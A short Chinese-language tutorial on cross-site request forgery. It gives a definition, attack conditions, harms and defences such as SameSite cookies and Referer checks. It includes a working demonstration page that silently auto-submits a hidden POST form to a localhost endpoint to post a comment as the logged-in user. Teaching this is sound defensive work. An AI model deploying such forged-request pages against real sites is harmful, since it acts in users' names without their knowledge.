定义
- CSRF(Cross Site Request Forgery),即跨站请求伪造,是一种常见的Web攻击
- 它利用用户已登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作。
操作实现
- 用户已经登录了站点A,并在本地记录了 cookie
- 在用户没有登出站点A的情况下(也就是 cookie生效的情况下),访问了恶意攻击者提供的引诱危险站点B(B站点要求访问站点A)
- 站点A没有做任何CSRF防御
- 模拟攻击,登录http://localhost:4000/csrf.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF模拟攻击</title>
</head>
<body>
<script>
document.write('<form action="http://localhost:3000/updateText" method="POST">添加评论<input type="text" name="text" value="CSRF评论" /></form>')
var iframe = document.createElement('iframe')
iframe.name = 'csrf'
iframe.style.display = 'none'
document.body.appendChild(iframe)
setTimeout(() => {
document.querySelector('form').submit()
}, 1000)
</script>
</body>
</html>
危害
- 利用用户登录态、用户不知情
- 完成业务请求、盗取用户资金(转账,消费)
- 冒充用户发帖背锅、损害网站声誉
防范手段
- 禁止第三方网站带cookie-有兼容性问题
- Referer Check - HTTPS不发送referer(不一定所有的都有Referer)
app.use(async (ctx, next) => {
await next()
const referer = ctx.request.header.referer
console.log('Referer', referer)
})